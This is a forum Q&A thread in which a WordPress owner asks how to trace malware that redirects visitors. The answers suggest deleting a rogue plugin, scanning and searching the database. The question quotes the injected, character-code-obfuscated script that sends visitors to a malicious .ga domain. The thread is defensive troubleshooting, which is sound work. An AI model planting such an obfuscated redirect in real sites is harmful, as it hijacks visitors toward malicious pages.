# WordPress site hacked redirect

Tags: javascript, php, wordpress

i have a wordpress website and i saw that when i try to view the source code with chrome its show me this (look at the code):

so i search it in my files and found a file called lt_ that has that redirect code
so i wanted to know how to find the source of the malware

```
<head>
    <script>window.location.href = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 105, 114, 99, 46, 108, 111, 118, 101, 103, 114, 101, 101, 110, 112, 101, 110, 99, 105, 108, 115, 46, 103, 97, 47, 112, 86, 77, 89, 110, 49, 120, 82, 63, 101, 120, 116, 101, 114, 110, 97, 108, 95, 105, 100, 61, 50, 49, 38, 97, 100, 95, 99, 97, 109, 112, 97, 105, 103, 110, 95, 105, 100, 61, 52, 51, 54, 55, 53);</script>
</head>
```

Comment: src seems to be: irc.lovegreenpencils.ga.[Fix](https://www.wpwhitesecurity.com/clean-hacked-wordpress-website-blog/)

Answer (score 0, accepted):

check this: wp-content/plugins/ * try to find wp-sleeeps * / that is the problem.
Delete wp-sleeeps and after that delete lt_
Same problem last 3 hours,

Answer (score 0):

First, install WordFence and configure it for a Through scan, see if anything suspicious pops up in the scan.

If you want to search the files by the string, i suggest installing a plugin "String Locator". It's the quickest way to search through all WP files.

If your WP was hacked, in 99,9% of the cases it's not only 1 file.

When, and if, you identify the string that is suspicious, i suggest to run it through phpMyAdmin search as well to ensure it's not planted in the database to some of your pages.